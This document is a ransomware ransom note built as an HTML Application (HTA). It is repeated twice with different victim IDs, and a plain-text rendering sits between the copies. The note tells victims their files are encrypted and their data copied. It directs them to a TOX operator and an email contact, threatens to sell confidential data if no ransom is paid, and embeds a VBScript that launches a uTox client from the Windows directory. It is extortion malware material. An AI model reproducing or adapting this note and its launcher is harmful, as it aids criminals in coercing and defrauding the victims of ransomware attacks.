<html><head><meta charset='UTF-8'><title>RECOVERY TOOL</title><HTA:APPLICATION ICON='msiexec.exe' SINGLEINSTANCE='yes' SysMenu='no'> <script>window.moveTo(50,50);window.resizeTo(screen.width-100,screen.height-100);</script><style type='text/css'>body{background:#000}.b{font:120%;font-weight:bold;color:#fff}.a{background:#f00;border-left:10px}.q{text-align:center;font:200%;font-weight:bold;margin-bottom:20px;color:#fff}</style></head><body><div class='q'>FILES ARE ENCRYPTED</div><div class='b'>All your files were encrypted and important data was copied to our storage</br>If you want to recover files, contact the operator in the TOX application, enter YOUR ID <font color=Lime> ujpkqnwq2</font></br>Add the ID <font color=Blue>3CC7CCEF369D6A7A4F6CAD11D12D7DE671909962944A7D034282F1F7B54F9D3522E570232A0B</font> of your personal operator as a friend so that you can start chatting.</br>If the Operator did not respond within 24 hours or encountered any problem then send an email to our support <font color=Blue>[email protected]</font></br>In the header of the letter, indicate your ID and attach 2-3 infected files to generate a private key and compile the decryptor</br>Files should not have important information and should not exceed the size of more than 5 MB</br>After receiving the ransom, we will send a recovery tool with detailed instructions within an hour and delete your files from our storages</div></br><div class='a'><div class='q'>Attention</div><ul><div class='b'><li>Do not rename encrypted files.</li><li>Do not try to decrypt your data using third party software, it may cause permanent data loss.</li><li>If you refuse to pay the ransom, Important Data that contains personal confidential information or trade secrets will be sold to third parties interested in them.</br>In any case, we will receive a payment, and your company will face problems in law enforcement and judicial areas.</li></div></ul></div><script language='VBScript'> On Error Resume Next set S=CreateObject("Wscript.shell") utox=S.ExpandEnvironmentStrings("%windir%\utox.exe") If not CreateObject("Scripting.FileSystemObject").FileExists(utox) Then MsgBox "Find and download UTOX.EXE file on the Internet and start..." End If S.Run utox & " -p",1 </script></body></html>

FILES ARE ENCRYPTED All your files were encrypted and important data was copied to our storageIf you want to recover files, contact the operator in the TOX application, enter YOUR ID Add the ID of your personal operator as a friend so that you can start chatting.If the Operator did not respond within 24 hours or encountered any problem then send an email to our support In the header of the letter, indicate your ID and attach 2-3 infected files to generate a private key and compile the decryptorFiles should not have important information and should not exceed the size of more than 5 MBAfter receiving the ransom, we will send a recovery tool with detailed instructions within an hour and delete your files from our storages Attention Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. If you refuse to pay the ransom, Important Data that contains personal confidential information or trade secrets will be sold to third parties interested in them.In any case, we will receive a payment, and your company will face problems in law enforcement and judicial areas.

<html><head><meta charset='UTF-8'><title>RECOVERY TOOL</title><HTA:APPLICATION ICON='msiexec.exe' SINGLEINSTANCE='yes' SysMenu='no'> <script>window.moveTo(50,50);window.resizeTo(screen.width-100,screen.height-100);</script><style type='text/css'>body{background:#000}.b{font:120%;font-weight:bold;color:#fff}.a{background:#f00;border-left:10px}.q{text-align:center;font:200%;font-weight:bold;margin-bottom:20px;color:#fff}</style></head><body><div class='q'>FILES ARE ENCRYPTED</div><div class='b'>All your files were encrypted and important data was copied to our storage</br>If you want to recover files, contact the operator in the TOX application, enter YOUR ID <font color=Lime> rrtvppwq2</font></br>Add the ID <font color=Blue>3CC7CCEF369D6A7A4F6CAD11D12D7DE671909962944A7D034282F1F7B54F9D3522E570232A0B</font> of your personal operator as a friend so that you can start chatting.</br>If the Operator did not respond within 24 hours or encountered any problem then send an email to our support <font color=Blue>[email protected]</font></br>In the header of the letter, indicate your ID and attach 2-3 infected files to generate a private key and compile the decryptor</br>Files should not have important information and should not exceed the size of more than 5 MB</br>After receiving the ransom, we will send a recovery tool with detailed instructions within an hour and delete your files from our storages</div></br><div class='a'><div class='q'>Attention</div><ul><div class='b'><li>Do not rename encrypted files.</li><li>Do not try to decrypt your data using third party software, it may cause permanent data loss.</li><li>If you refuse to pay the ransom, Important Data that contains personal confidential information or trade secrets will be sold to third parties interested in them.</br>In any case, we will receive a payment, and your company will face problems in law enforcement and judicial areas.</li></div></ul></div><script language='VBScript'> On Error Resume Next set S=CreateObject("Wscript.shell") utox=S.ExpandEnvironmentStrings("%windir%\utox.exe") If not CreateObject("Scripting.FileSystemObject").FileExists(utox) Then MsgBox "Find and download UTOX.EXE file on the Internet and start..." End If S.Run utox & " -p",1 </script></body></html>